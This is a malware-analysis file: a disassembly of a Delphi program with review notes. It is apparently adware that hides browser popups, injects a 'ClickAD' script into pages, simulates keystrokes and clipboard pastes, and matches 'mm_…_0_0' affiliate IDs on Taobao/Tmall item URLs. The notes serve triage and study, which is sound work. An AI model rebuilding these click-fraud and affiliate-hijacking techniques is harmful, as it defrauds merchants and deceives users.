004BD315 59 pop ecx
004BD316 648910 mov fs:[eax], edx

****** FINALLY
|
004BD319 684BD34B00 push $004BD34B
004BD31E 8D45EC lea eax, [ebp-$14]
004BD321 BA02000000 mov edx, $00000002

|
004BD326 E8ED81F4FF call 00405518
004BD32B 8D45F4 lea eax, [ebp-$0C]

|
004BD32E E8099FF4FF call 0040723C
004BD333 8D45F8 lea eax, [ebp-$08]

|
004BD336 E8019FF4FF call 0040723C
004BD33B 8D45FC lea eax, [ebp-$04]

|
004BD33E E8F99EF4FF call 0040723C
004BD343 C3 ret

|
004BD344 E99379F4FF jmp 00404CDC
004BD349 EBD3 jmp 004BD31E

****** END
|
004BD34B 5E pop esi
004BD34C 5B pop ebx
004BD34D 8BE5 mov esp, ebp
004BD34F 5D pop ebp
004BD350 C20400 ret $0004

*)
end;

// webb2NewWindow2: NewWindow2 handler of webb2 (raw DeDe disassembly, kept
// verbatim). The logic is the same as in WebbNewWindow2.
//  - If the interface global at $004CDD5C is set, vtable slot +$3C is called
//    on it and the returned interface is assigned to the location passed in
//    ecx (presumably the event's ppDisp parameter).
//  - Otherwise property dispid $C8 (200; Application in the SHDocVw type
//    library) of the Webb1 control is assigned there instead.
//  - The word at [ebp+$08] (presumably the Cancel parameter) is set to 0 on
//    success and to $FFFF if an exception is raised.
// NOTE(review): the effect is that pages requesting a new window are
// redirected into a browser object the form already owns, so no separate
// visible browser window appears. TODO confirm the parameter mapping.
procedure Tfrm_SSMoon.webb2NewWindow2(Sender : TObject);
begin
(*
004BD370 55 push ebp
004BD371 8BEC mov ebp, esp
004BD373 6A00 push $00
004BD375 6A00 push $00
004BD377 53 push ebx
004BD378 56 push esi
004BD379 57 push edi
004BD37A 8BF1 mov esi, ecx
004BD37C 8BD8 mov ebx, eax
004BD37E 33C0 xor eax, eax
004BD380 55 push ebp
004BD381 682AD44B00 push $004BD42A

***** TRY
|
004BD386 64FF30 push dword ptr fs:[eax]
004BD389 648920 mov fs:[eax], esp
004BD38C 33C0 xor eax, eax
004BD38E 55 push ebp
004BD38F 68F7D34B00 push $004BD3F7

***** TRY
|
004BD394 64FF30 push dword ptr fs:[eax]
004BD397 648920 mov fs:[eax], esp
004BD39A 833D5CDD4C0000 cmp dword ptr [$004CDD5C], +$00
004BD3A1 7425 jz 004BD3C8
004BD3A3 8D45FC lea eax, [ebp-$04]

|
004BD3A6 E8919EF4FF call 0040723C
004BD3AB 50 push eax
004BD3AC A15CDD4C00 mov eax, dword ptr [$004CDD5C]
004BD3B1 50 push eax
004BD3B2 8B00 mov eax, [eax]
004BD3B4 FF503C call dword ptr [eax+$3C]

|
004BD3B7 E8909FF4FF call 0040734C
004BD3BC 8B55FC mov edx, [ebp-$04]
004BD3BF 8BC6 mov eax, esi

|
004BD3C1 E88E9EF4FF call 00407254
004BD3C6 EB1D jmp 004BD3E5
004BD3C8 8D4DF8 lea ecx, [ebp-$08]

* Reference to control Tfrm_SSMoon.Webb1 : TWebBrowser
|
004BD3CB 8B8368030000 mov eax, [ebx+$0368]
004BD3D1 BAC8000000 mov edx, $000000C8

* Reference to : TOleControl._PROC_0046CE4C()
|
004BD3D6 E871FAFAFF call 0046CE4C
004BD3DB 8B55F8 mov edx, [ebp-$08]
004BD3DE 8BC6 mov eax, esi

|
004BD3E0 E86F9EF4FF call 00407254
004BD3E5 8B4508 mov eax, [ebp+$08]
004BD3E8 66C7000000 mov word ptr [eax], $0000
004BD3ED 33C0 xor eax, eax
004BD3EF 5A pop edx
004BD3F0 59 pop ecx
004BD3F1 59 pop ecx
004BD3F2 648910 mov fs:[eax], edx
004BD3F5 EB12 jmp 004BD409

|
004BD3F7 E92C76F4FF jmp 00404A28
004BD3FC 8B4508 mov eax, [ebp+$08]
004BD3FF 66C700FFFF mov word ptr [eax], $FFFF

|
004BD404 E82F7AF4FF call 00404E38

****** END
|
004BD409 33C0 xor eax, eax
004BD40B 5A pop edx
004BD40C 59 pop ecx
004BD40D 59 pop ecx
004BD40E 648910 mov fs:[eax], edx

****** FINALLY
|
004BD411 6831D44B00 push $004BD431
004BD416 8D45F8 lea eax, [ebp-$08]

* Reference to object IDispatch
|
004BD419 8B15B8114000 mov edx, [$004011B8]
004BD41F B902000000 mov ecx, $00000002

|
004BD424 E80F8DF4FF call 00406138
004BD429 C3 ret

|
004BD42A E9AD78F4FF jmp 00404CDC
004BD42F EBE5 jmp 004BD416

****** END
|
004BD431 5F pop edi
004BD432 5E pop esi
004BD433 5B pop ebx
004BD434 59 pop ecx
004BD435 59 pop ecx
004BD436 5D pop ebp
004BD437 C20400 ret $0004

*)
end;

// WebbNewWindow2: NewWindow2 handler of Webb (raw DeDe disassembly, kept
// verbatim). The logic is the same as in webb2NewWindow2.
//  - If the interface global at $004CDD5C is set, vtable slot +$3C is called
//    on it and the returned interface is assigned to the location passed in
//    ecx (presumably the event's ppDisp parameter).
//  - Otherwise property dispid $C8 (200; Application in the SHDocVw type
//    library) of the Webb1 control is assigned there instead.
//  - The word at [ebp+$08] (presumably the Cancel parameter) is set to 0 on
//    success and to $FFFF if an exception is raised.
// NOTE(review): new-window requests are therefore answered with a browser
// object the form already owns, so no separate visible browser window
// appears. TODO confirm the parameter mapping.
procedure Tfrm_SSMoon.WebbNewWindow2(Sender : TObject);
begin
(*
004BC974 55 push ebp
004BC975 8BEC mov ebp, esp
004BC977 6A00 push $00
004BC979 6A00 push $00
004BC97B 53 push ebx
004BC97C 56 push esi
004BC97D 57 push edi
004BC97E 8BF1 mov esi, ecx
004BC980 8BD8 mov ebx, eax
004BC982 33C0 xor eax, eax
004BC984 55 push ebp
004BC985 682ECA4B00 push $004BCA2E

***** TRY
|
004BC98A 64FF30 push dword ptr fs:[eax]
004BC98D 648920 mov fs:[eax], esp
004BC990 33C0 xor eax, eax
004BC992 55 push ebp
004BC993 68FBC94B00 push $004BC9FB

***** TRY
|
004BC998 64FF30 push dword ptr fs:[eax]
004BC99B 648920 mov fs:[eax], esp
004BC99E 833D5CDD4C0000 cmp dword ptr [$004CDD5C], +$00
004BC9A5 7425 jz 004BC9CC
004BC9A7 8D45FC lea eax, [ebp-$04]

|
004BC9AA E88DA8F4FF call 0040723C
004BC9AF 50 push eax
004BC9B0 A15CDD4C00 mov eax, dword ptr [$004CDD5C]
004BC9B5 50 push eax
004BC9B6 8B00 mov eax, [eax]
004BC9B8 FF503C call dword ptr [eax+$3C]

|
004BC9BB E88CA9F4FF call 0040734C
004BC9C0 8B55FC mov edx, [ebp-$04]
004BC9C3 8BC6 mov eax, esi

|
004BC9C5 E88AA8F4FF call 00407254
004BC9CA EB1D jmp 004BC9E9
004BC9CC 8D4DF8 lea ecx, [ebp-$08]

* Reference to control Tfrm_SSMoon.Webb1 : TWebBrowser
|
004BC9CF 8B8368030000 mov eax, [ebx+$0368]
004BC9D5 BAC8000000 mov edx, $000000C8

* Reference to : TOleControl._PROC_0046CE4C()
|
004BC9DA E86D04FBFF call 0046CE4C
004BC9DF 8B55F8 mov edx, [ebp-$08]
004BC9E2 8BC6 mov eax, esi

|
004BC9E4 E86BA8F4FF call 00407254
004BC9E9 8B4508 mov eax, [ebp+$08]
004BC9EC 66C7000000 mov word ptr [eax], $0000
004BC9F1 33C0 xor eax, eax
004BC9F3 5A pop edx
004BC9F4 59 pop ecx
004BC9F5 59 pop ecx
004BC9F6 648910 mov fs:[eax], edx
004BC9F9 EB12 jmp 004BCA0D

|
004BC9FB E92880F4FF jmp 00404A28
004BCA00 8B4508 mov eax, [ebp+$08]
004BCA03 66C700FFFF mov word ptr [eax], $FFFF

|
004BCA08 E82B84F4FF call 00404E38

****** END
|
004BCA0D 33C0 xor eax, eax
004BCA0F 5A pop edx
004BCA10 59 pop ecx
004BCA11 59 pop ecx
004BCA12 648910 mov fs:[eax], edx

****** FINALLY
|
004BCA15 6835CA4B00 push $004BCA35
004BCA1A 8D45F8 lea eax, [ebp-$08]

* Reference to object IDispatch
|
004BCA1D 8B15B8114000 mov edx, [$004011B8]
004BCA23 B902000000 mov ecx, $00000002

|
004BCA28 E80B97F4FF call 00406138
004BCA2D C3 ret

|
004BCA2E E9A982F4FF jmp 00404CDC
004BCA33 EBE5 jmp 004BCA1A

****** END
|
004BCA35 5F pop edi
004BCA36 5E pop esi
004BCA37 5B pop ebx
004BCA38 59 pop ecx
004BCA39 59 pop ecx
004BCA3A 5D pop ebp
004BCA3B C20400 ret $0004

*)
end;

// _PROC_004BA92A: not a real procedure. DeDe disassembled constant data as
// code; the "instructions" below are meaningless.
// NOTE(review): read as raw bytes, the range looks like a table of COM
// interface IDs:
//   004BA92A  00 C0 4F D9 01 19 -- matches the last six bytes of
//             IID_IHTMLDocument2 (332C4425-26CB-11D0-B483-00C04FD90119)
//   004BA930  61 16 0C D3 AF CD D0 11 8A 3E 00 C0 4F C9 E2 6E -- matches
//             IID_IWebBrowser2 (D30C1661-CDAF-11D0-8A3E-00C04FC9E26E)
//   004BA940  05 DF 02 00 00 00 00 ... -- matches the start of
//             IID_IWebBrowserApp (0002DF05-0000-0000-C000-000000000046)
// Confirm by dumping the full range as data in a disassembler.
procedure Tfrm_SSMoon._PROC_004BA92A(Sender : TObject);
begin
(*
004BA92A 00C0 add al, al
004BA92C 4F dec edi
004BA92D D901 fld dword ptr [ecx]
004BA92F 196116 sbb [ecx+$16], esp
004BA932 0CD3 or al, $D3
004BA934 AF scasd
004BA935 CDD0 int $D0
004BA937 118A3E00C04F adc [edx+$4FC0003E], ecx
004BA93D C9 leave
004BA93E E26E loop +$6E
004BA940 05DF020000 add eax, +$000002DF
004BA945 0000 add [eax], al

*)
end;

// _PROC_004BA961: helper that runs the injected ClickAD script (raw DeDe
// disassembly, kept verbatim).
// NOTE(review): the listing starts at "mov ebp, esp"; the real entry point is
// presumably one byte earlier (a "push ebp" at 004BA960), and this is a plain
// routine taking a string in eax rather than a (Sender : TObject) method.
// What the listing shows:
//  - The result byte [ebp-$01] starts as 1 (True).
//  - If the interface global at $004CDD64 is nil, the result is set to 0.
//  - Otherwise the string 'ClickAD("' + <argument> + '");' is built,
//    converted by 00405E5C and passed, together with the constant at
//    $004BAA3C and an out-value, to vtable slot +$0110 of that interface.
//    The argument order matches IHTMLWindow2.execScript(code, language);
//    TODO confirm against the interface stored by WebbDocumentComplete.
//  - Any exception sets the result to 0; the byte is returned in eax.
// The garbled "Possible String Reference" points at $004BA9F2, the exception
// handler address inside this routine, not at a real string.
procedure Tfrm_SSMoon._PROC_004BA961(Sender : TObject);
begin
(*
004BA961 8BEC mov ebp, esp
004BA963 33C9 xor ecx, ecx
004BA965 51 push ecx
004BA966 51 push ecx
004BA967 51 push ecx
004BA968 51 push ecx
004BA969 51 push ecx
004BA96A 51 push ecx
004BA96B 51 push ecx
004BA96C 53 push ebx
004BA96D 56 push esi
004BA96E 57 push edi
004BA96F 8BF0 mov esi, eax
004BA971 33C0 xor eax, eax
004BA973 55 push ebp
004BA974 6826AA4B00 push $004BAA26

***** TRY
|
004BA979 64FF30 push dword ptr fs:[eax]
004BA97C 648920 mov fs:[eax], esp
004BA97F C645FF01 mov byte ptr [ebp-$01], $01
004BA983 33C0 xor eax, eax
004BA985 55 push ebp

* Possible String Reference to: '?狋艵'
|
004BA986 68F2A94B00 push $004BA9F2

***** TRY
|
004BA98B 64FF30 push dword ptr fs:[eax]
004BA98E 648920 mov fs:[eax], esp
004BA991 833D64DD4C0000 cmp dword ptr [$004CDD64], +$00
004BA998 744A jz 004BA9E4
004BA99A 8D45EC lea eax, [ebp-$14]

|
004BA99D E8AE77F5FF call 00412150
004BA9A2 50 push eax
004BA9A3 683CAA4B00 push $004BAA3C

* Possible String Reference to: 'ClickAD("'
|
004BA9A8 685CAA4B00 push $004BAA5C
004BA9AD 56 push esi

* Possible String Reference to: '");'
|
004BA9AE 6870AA4B00 push $004BAA70
004BA9B3 8D45E4 lea eax, [ebp-$1C]
004BA9B6 BA03000000 mov edx, $00000003

|
004BA9BB E8C8AEF4FF call 00405888
004BA9C0 8B55E4 mov edx, [ebp-$1C]
004BA9C3 8D45E8 lea eax, [ebp-$18]

|
004BA9C6 E891B4F4FF call 00405E5C
004BA9CB 8B45E8 mov eax, [ebp-$18]
004BA9CE 50 push eax
004BA9CF A164DD4C00 mov eax, dword ptr [$004CDD64]
004BA9D4 50 push eax
004BA9D5 8B00 mov eax, [eax]
004BA9D7 FF9010010000 call dword ptr [eax+$0110]

|
004BA9DD E86AC9F4FF call 0040734C
004BA9E2 EB04 jmp 004BA9E8
004BA9E4 C645FF00 mov byte ptr [ebp-$01], $00
004BA9E8 33C0 xor eax, eax
004BA9EA 5A pop edx
004BA9EB 59 pop ecx
004BA9EC 59 pop ecx
004BA9ED 648910 mov fs:[eax], edx
004BA9F0 EB0E jmp 004BAA00

|
004BA9F2 E931A0F4FF jmp 00404A28
004BA9F7 C645FF00 mov byte ptr [ebp-$01], $00

|
004BA9FB E838A4F4FF call 00404E38

****** END
|
004BAA00 33C0 xor eax, eax
004BAA02 5A pop edx
004BAA03 59 pop ecx
004BAA04 59 pop ecx
004BAA05 648910 mov fs:[eax], edx

****** FINALLY
|
004BAA08 682DAA4B00 push $004BAA2D
004BAA0D 8D45E4 lea eax, [ebp-$1C]

|
004BAA10 E8DFAAF4FF call 004054F4
004BAA15 8D45E8 lea eax, [ebp-$18]

|
004BAA18 E8DFB2F4FF call 00405CFC
004BAA1D 8D45EC lea eax, [ebp-$14]

|
004BAA20 E82B77F5FF call 00412150
004BAA25 C3 ret

|
004BAA26 E9B1A2F4FF jmp 00404CDC
004BAA2B EBE0 jmp 004BAA0D

****** END
|
004BAA2D 0FB645FF movzx eax, byte ptr [ebp-$01]
004BAA31 5F pop edi
004BAA32 5E pop esi
004BAA33 5B pop ebx
004BAA34 8BE5 mov esp, ebp
004BAA36 5D pop ebp
004BAA37 C3 ret

*)
end;

// _PROC_004BAA38: not a real procedure. DeDe disassembled data as code.
// NOTE(review): the four bytes 14 00 00 00 are the dword $14 (20) sitting
// directly in front of $004BAA3C, the constant that _PROC_004BA961 pushes as
// the second string argument of its script call. This looks like the length
// prefix of a 20-byte (10-character wide) string constant, presumably the
// script language name. TODO confirm by dumping $004BAA3C as data.
procedure Tfrm_SSMoon._PROC_004BAA38(Sender : TObject);
begin
(*
004BAA38 1400 adc al, $00
004BAA3A 0000 add [eax], al

*)
end;

procedure Tfrm_SSMoon._PROC_004BAA95(Sender : TObject);
begin
(*
004BAA95 8BEC mov ebp, esp
004BAA97 33C9 xor ecx, ecx
004BAA99 51 push ecx
004BAA9A 51 push ecx
004BAA9B 51 push ecx
004BAA9C 51 push ecx
004BAA9D 51 push ecx
004BAA9E 51 push ecx
004BAA9F 51 push ecx
004BAAA0 53 push ebx
004BAAA1 56 push esi
004BAAA2 33C0 xor eax, eax
004BAAA4 55 push ebp

* Possible String Reference to: '閟狋脎^[嬪]?
|
004BAAA5 6864AC4B00 push $004BAC64

***** TRY
|
004BAAAA 64FF30 push dword ptr fs:[eax]
004BAAAD 648920 mov fs:[eax], esp
004BAAB0 A178674C00 mov eax, dword ptr [$004C6778]
004BAAB5 833800 cmp dword ptr [eax], +$00
004BAAB8 0F847B010000 jz 004BAC39

* Reference to: user32.GetForegroundWindow()
|
004BAABE E895D7F4FF call 00408258
004BAAC3 8BF0 mov esi, eax
004BAAC5 A154DD4C00 mov eax, dword ptr [$004CDD54]

|
004BAACA E8D14EF9FF call 0044F9A0
004BAACF 50 push eax

* Reference to: user32.SetForegroundWindow()
|
004BAAD0 E873DAF4FF call 00408548
004BAAD5 8D45FC lea eax, [ebp-$04]

|
004BAAD8 E85FC7F4FF call 0040723C
004BAADD 50 push eax
004BAADE 8D4DF8 lea ecx, [ebp-$08]
004BAAE1 A154DD4C00 mov eax, dword ptr [$004CDD54]

* Reference to control webb2 : TWebBrowser
|
004BAAE6 8B8074030000 mov eax, [eax+$0374]
004BAAEC BACB000000 mov edx, $000000CB

* Reference to : TOleControl._PROC_0046CE4C()
|
004BAAF1 E85623FBFF call 0046CE4C
004BAAF6 8B45F8 mov eax, [ebp-$08]
004BAAF9 50 push eax
004BAAFA 8B00 mov eax, [eax]
004BAAFC FF90B0010000 call dword ptr [eax+$01B0]

|
004BAB02 E845C8F4FF call 0040734C
004BAB07 8B45FC mov eax, [ebp-$04]
004BAB0A 50 push eax
004BAB0B 8B00 mov eax, [eax]
004BAB0D FF90EC000000 call dword ptr [eax+$00EC]

|
004BAB13 E834C8F4FF call 0040734C

* Possible String Reference to: '{TAB '
|
004BAB18 687CAC4B00 push $004BAC7C
004BAB1D 8D55F0 lea edx, [ebp-$10]
004BAB20 A154DD4C00 mov eax, dword ptr [$004CDD54]
004BAB25 8B8088030000 mov eax, [eax+$0388]
004BAB2B 8B402C mov eax, [eax+$2C]

|
004BAB2E E8D9F6F4FF call 0040A20C
004BAB33 FF75F0 push dword ptr [ebp-$10]
004BAB36 688CAC4B00 push $004BAC8C
004BAB3B 8D45F4 lea eax, [ebp-$0C]
004BAB3E BA03000000 mov edx, $00000003

|
004BAB43 E840ADF4FF call 00405888
004BAB48 8B45F4 mov eax, [ebp-$0C]

|
004BAB4B E834AEF4FF call 00405984
004BAB50 33D2 xor edx, edx

|
004BAB52 E87932FFFF call 004ADDD0
004BAB57 B201 mov dl, $01

* Reference to class TClipboard
|
004BAB59 A118934300 mov eax, dword ptr [$00439318]

|
004BAB5E E8B599F4FF call 00404518
004BAB63 8BD8 mov ebx, eax
004BAB65 8D55EC lea edx, [ebp-$14]
004BAB68 8BC3 mov eax, ebx

* Reference to : TClipboard._PROC_0043959C()
|
004BAB6A E82DEAF7FF call 0043959C
004BAB6F 8B55EC mov edx, [ebp-$14]
004BAB72 B874DD4C00 mov eax, $004CDD74

|
004BAB77 E8CCA9F4FF call 00405548
004BAB7C 8BC3 mov eax, ebx
004BAB7E 8B10 mov edx, [eax]

* Possible reference to virtual method TClipboard.OFFS_18
|
004BAB80 FF5218 call dword ptr [edx+$18]
004BAB83 8BC3 mov eax, ebx
004BAB85 8B10 mov edx, [eax]

* Possible reference to virtual method TClipboard.OFFS_10
|
004BAB87 FF5210 call dword ptr [edx+$10]
004BAB8A 8B1578674C00 mov edx, [$004C6778]
004BAB90 8B12 mov edx, [edx]
004BAB92 8BC3 mov eax, ebx

* Reference to : TClipboard._PROC_0043961C()
|
004BAB94 E883EAF7FF call 0043961C

* Possible String Reference to: '^v'
|
004BAB99 B890AC4B00 mov eax, $004BAC90
004BAB9E 33D2 xor edx, edx

|
004BABA0 E82B32FFFF call 004ADDD0
004BABA5 8BC3 mov eax, ebx
004BABA7 8B10 mov edx, [eax]

* Possible reference to virtual method TClipboard.OFFS_14
|
004BABA9 FF5214 call dword ptr [edx+$14]
004BABAC 8BC3 mov eax, ebx

|
004BABAE E89599F4FF call 00404548

* Possible String Reference to: '{TAB '
|
004BABB3 687CAC4B00 push $004BAC7C
004BABB8 8D55E4 lea edx, [ebp-$1C]
004BABBB A154DD4C00 mov eax, dword ptr [$004CDD54]
004BABC0 8B8088030000 mov eax, [eax+$0388]
004BABC6 8B4030 mov eax, [eax+$30]

|
004BABC9 E83EF6F4FF call 0040A20C
004BABCE FF75E4 push dword ptr [ebp-$1C]
004BABD1 688CAC4B00 push $004BAC8C
004BABD6 8D45E8 lea eax, [ebp-$18]
004BABD9 BA03000000 mov edx, $00000003

|
004BABDE E8A5ACF4FF call 00405888
004BABE3 8B45E8 mov eax, [ebp-$18]

|
004BABE6 E899ADF4FF call 00405984
004BABEB 33D2 xor edx, edx

|
004BABED E8DE31FFFF call 004ADDD0
004BABF2 B020 mov al, $20

|
004BABF4 E87BFEFFFF call 004BAA74

* Reference to: kernel32.GetTickCount()
|
004BABF9 E8C2D0F4FF call 00407CC0
004BABFE 8BD8 mov ebx, eax

* Reference to: kernel32.GetTickCount()
|
004BAC00 E8BBD0F4FF call 00407CC0
004BAC05 33D2 xor edx, edx
004BAC07 52 push edx
004BAC08 50 push eax
004BAC09 8BC3 mov eax, ebx
004BAC0B 99 cdq
004BAC0C 290424 sub dword ptr [esp], eax
004BAC0F 19542404 sbb [esp+$04], edx
004BAC13 58 pop eax
004BAC14 5A pop edx
004BAC15 83FA00 cmp edx, +$00
004BAC18 7509 jnz 004BAC23
004BAC1A 3DE8030000 cmp eax, $000003E8
004BAC1F 7604 jbe 004BAC25
004BAC21 EB10 jmp 004BAC33
004BAC23 7F0E jnle 004BAC33
004BAC25 A12C664C00 mov eax, dword ptr [$004C662C]
004BAC2A 8B00 mov eax, [eax]

|
004BAC2C E857B7FAFF call 00466388
004BAC31 EBCD jmp 004BAC00
004BAC33 56 push esi

* Reference to: user32.SetForegroundWindow()
|
004BAC34 E80FD9F4FF call 00408548
004BAC39 33C0 xor eax, eax
004BAC3B 5A pop edx
004BAC3C 59 pop ecx
004BAC3D 59 pop ecx
004BAC3E 648910 mov fs:[eax], edx

****** FINALLY
|

* Possible String Reference to: '^[嬪]?
|
004BAC41 686BAC4B00 push $004BAC6B
004BAC46 8D45E4 lea eax, [ebp-$1C]
004BAC49 BA05000000 mov edx, $00000005

|
004BAC4E E8C5A8F4FF call 00405518
004BAC53 8D45F8 lea eax, [ebp-$08]

|
004BAC56 E8E1C5F4FF call 0040723C
004BAC5B 8D45FC lea eax, [ebp-$04]

|
004BAC5E E8D9C5F4FF call 0040723C
004BAC63 C3 ret

|
004BAC64 E973A0F4FF jmp 00404CDC
004BAC69 EBDB jmp 004BAC46

****** END
|
004BAC6B 5E pop esi
004BAC6C 5B pop ebx
004BAC6D 8BE5 mov esp, ebp
004BAC6F 5D pop ebp
004BAC70 C3 ret

*)
end;

procedure Tfrm_SSMoon._PROC_004BACE1(Sender : TObject);
begin
// Analyst note: tail of a "string is all decimal digits" check.
//
// NOTE(review): the listing appears to start in the middle of the routine.
// The first two decoded lines (far jmp, sar) are most likely a mis-aligned
// decode: read one byte earlier, EA 04 / 8B 12 / 85 D2 / 7E 1B would be
// sub edx,4 / mov edx,[edx] / test edx,edx / jle 004BAD04, the same
// length-prefix read seen at 004BAE62. The real entry is presumably
// 004BACD4, which _PROC_004BAD51 calls at 004BAF19 before testing AL.
// The (Sender : TObject) signature is the decompiler's placeholder; the
// caller passes a string pointer in EAX.
//
// Visible logic:
//   esi = 1-based index; edi = string base and edx = remaining count, both
//   presumably set up in the bytes that are not listed.
//   cl = byte + $D0 is byte - '0' modulo 256; sub cl,$0A then sets carry
//   only when that value is 0..9, so jb continues on a digit.
//   Any non-digit byte returns EAX = 0.
//   When the count runs out, the routine returns with EAX unchanged,
//   presumably the "true" value loaded by the missing prologue (TODO confirm).
(*
004BACE1 EA048B1285 jmp $85128B04
004BACE6 D27E1B sar byte ptr [esi+$1B], cl
004BACE9 BE01000000 mov esi, $00000001
004BACEE 0FB64C37FF movzx ecx, byte ptr [edi+esi-$01]
004BACF3 80C1D0 add cl, $D0
004BACF6 80E90A sub cl, $0A
004BACF9 7205 jb 004BAD00
004BACFB 33C0 xor eax, eax
004BACFD 5F pop edi
004BACFE 5E pop esi
004BACFF C3 ret

004BAD00 46 inc esi
004BAD01 4A dec edx
004BAD02 75EA jnz 004BACEE
004BAD04 5F pop edi
004BAD05 5E pop esi
004BAD06 C3 ret

*)
end;

procedure Tfrm_SSMoon._PROC_004BAD08(Sender : TObject);
begin
// Analyst note: boolean helper that reports whether the string passed in
// EAX contains both 'mm_' and '_0_0'.
//
// The (Sender : TObject) signature is the decompiler's placeholder; the
// code treats EAX as a string and keeps it in EBX across both calls.
// 00405AD0 is called with EAX = constant substring and EDX = subject, and
// its result is only compared against zero; presumably it is the RTL
// Pos helper (TODO confirm).
//
// Returns AL = 1 only when both searches return a value > 0, otherwise
// EAX = 0. The relative order of the two markers is not checked.
//
// NOTE(review): 'mm_' ... '_0_0' looks like an affiliate/publisher ID
// pattern. That fits the taoke.alimama.com request built at 004BAF8B in
// _PROC_004BAD51, which repeats the same two searches at 004BAD96 and
// 004BADA8. Together with that URL, the two constants ($004BAD3C and
// $004BAD48) are usable static strings for triaging related samples.
(*
004BAD08 53 push ebx
004BAD09 8BD8 mov ebx, eax
004BAD0B 8BD3 mov edx, ebx

* Possible String Reference to: 'mm_'
|
004BAD0D B83CAD4B00 mov eax, $004BAD3C

|
004BAD12 E8B9ADF4FF call 00405AD0
004BAD17 85C0 test eax, eax
004BAD19 7E10 jle 004BAD2B
004BAD1B 8BD3 mov edx, ebx

* Possible String Reference to: '_0_0'
|
004BAD1D B848AD4B00 mov eax, $004BAD48

|
004BAD22 E8A9ADF4FF call 00405AD0
004BAD27 85C0 test eax, eax
004BAD29 7F04 jnle 004BAD2F
004BAD2B 33C0 xor eax, eax
004BAD2D 5B pop ebx
004BAD2E C3 ret

004BAD2F B001 mov al, $01
004BAD31 5B pop ebx
004BAD32 C3 ret

*)
end;

procedure Tfrm_SSMoon._PROC_004BAD51(Sender : TObject);
begin
(*
004BAD51 8BEC mov ebp, esp
004BAD53 83C4B0 add esp, -$50
004BAD56 53 push ebx
004BAD57 56 push esi
004BAD58 57 push edi
004BAD59 33DB xor ebx, ebx
004BAD5B 895DB0 mov [ebp-$50], ebx
004BAD5E 895DB4 mov [ebp-$4C], ebx
004BAD61 895DB8 mov [ebp-$48], ebx
004BAD64 895DBC mov [ebp-$44], ebx
004BAD67 895DD0 mov [ebp-$30], ebx
004BAD6A 895DFC mov [ebp-$04], ebx
004BAD6D 895DF8 mov [ebp-$08], ebx
004BAD70 895DF4 mov [ebp-$0C], ebx
004BAD73 895DF0 mov [ebp-$10], ebx
004BAD76 894DE8 mov [ebp-$18], ecx
004BAD79 8955EC mov [ebp-$14], edx
004BAD7C 8BF0 mov esi, eax
004BAD7E 33C0 xor eax, eax
004BAD80 55 push ebp
004BAD81 6892B14B00 push $004BB192

***** TRY
|
004BAD86 64FF30 push dword ptr fs:[eax]
004BAD89 648920 mov fs:[eax], esp
004BAD8C 8B45E8 mov eax, [ebp-$18]

|
004BAD8F E860A7F4FF call 004054F4
004BAD94 8BD6 mov edx, esi

* Possible String Reference to: 'mm_'
|
004BAD96 B8A8B14B00 mov eax, $004BB1A8

|
004BAD9B E830ADF4FF call 00405AD0
004BADA0 8BD8 mov ebx, eax
004BADA2 85DB test ebx, ebx
004BADA4 7E3B jle 004BADE1
004BADA6 8BD6 mov edx, esi

* Possible String Reference to: '_0_0'
|
004BADA8 B8B4B14B00 mov eax, $004BB1B4

|
004BADAD E81EADF4FF call 00405AD0
004BADB2 8BF8 mov edi, eax
004BADB4 85FF test edi, edi
004BADB6 0F8EA6030000 jle 004BB162
004BADBC 8D45F4 lea eax, [ebp-$0C]
004BADBF 50 push eax
004BADC0 8BCF mov ecx, edi
004BADC2 2BCB sub ecx, ebx
004BADC4 83E903 sub ecx, +$03
004BADC7 8D5303 lea edx, [ebx+$03]
004BADCA 8BC6 mov eax, esi

|
004BADCC E81BACF4FF call 004059EC
004BADD1 8B45F4 mov eax, [ebp-$0C]

|
004BADD4 E8BBFEFFFF call 004BAC94
004BADD9 84C0 test al, al
004BADDB 0F8581030000 jnz 004BB162
004BADE1 A154DD4C00 mov eax, dword ptr [$004CDD54]
004BADE6 8B8088030000 mov eax, [eax+$0388]
004BADEC 8B4018 mov eax, [eax+$18]
004BADEF 8B10 mov edx, [eax]
004BADF1 FF5214 call dword ptr [edx+$14]
004BADF4 85C0 test eax, eax
004BADF6 0F8E66030000 jle 004BB162
004BADFC 8D45F8 lea eax, [ebp-$08]
004BADFF 8BD6 mov edx, esi

|
004BAE01 E886A7F4FF call 0040558C
004BAE06 8BD6 mov edx, esi

* Possible String Reference to: 'item.tmall.com/item.htm?id='
|
004BAE08 B8C4B14B00 mov eax, $004BB1C4

|
004BAE0D E8BEACF4FF call 00405AD0
004BAE12 85C0 test eax, eax
004BAE14 7F34 jnle 004BAE4A
004BAE16 8BD6 mov edx, esi

* Possible String Reference to: 'item.tmall.com/auction/item_detail.
| htm?item_num_id='
|
004BAE18 B8E8B14B00 mov eax, $004BB1E8

|
004BAE1D E8AEACF4FF call 00405AD0
004BAE22 85C0 test eax, eax
004BAE24 7F24 jnle 004BAE4A
004BAE26 8BD6 mov edx, esi

* Possible String Reference to: 'item.taobao.com/item.htm?id='
|
004BAE28 B824B24B00 mov eax, $004BB224

|
004BAE2D E89EACF4FF call 00405AD0
004BAE32 85C0 test eax, eax
004BAE34 7F14 jnle 004BAE4A
004BAE36 8BD6 mov edx, esi

* Possible String Reference to: 'item.taobao.com/auction/item_detail
| .htm?item_num_id='
|
004BAE38 B84CB24B00 mov eax, $004BB24C

|
004BAE3D E88EACF4FF call 00405AD0
004BAE42 85C0 test eax, eax
004BAE44 0F8E18030000 jle 004BB162
004BAE4A 8BD6 mov edx, esi
004BAE4C B88CB24B00 mov eax, $004BB28C

|
004BAE51 E87AACF4FF call 00405AD0
004BAE56 8BD8 mov ebx, eax
004BAE58 85DB test ebx, ebx
004BAE5A 7522 jnz 004BAE7E
004BAE5C 8BDE mov ebx, esi
004BAE5E 85DB test ebx, ebx
004BAE60 7405 jz 004BAE67
004BAE62 83EB04 sub ebx, +$04
004BAE65 8B1B mov ebx, [ebx]
004BAE67 8D45F8 lea eax, [ebp-$08]
004BAE6A 50 push eax
004BAE6B 8BCB mov ecx, ebx
004BAE6D 83E907 sub ecx, +$07
004BAE70 BA08000000 mov edx, $00000008
004BAE75 8BC6 mov eax, esi

|
004BAE77 E870ABF4FF call 004059EC
004BAE7C EB15 jmp 004BAE93
004BAE7E 8D45F8 lea eax, [ebp-$08]
004BAE81 50 push eax
004BAE82 8BCB mov ecx, ebx
004BAE84 83E908 sub ecx, +$08
004BAE87 BA08000000 mov edx, $00000008
004BAE8C 8BC6 mov eax, esi

|
004BAE8E E859ABF4FF call 004059EC
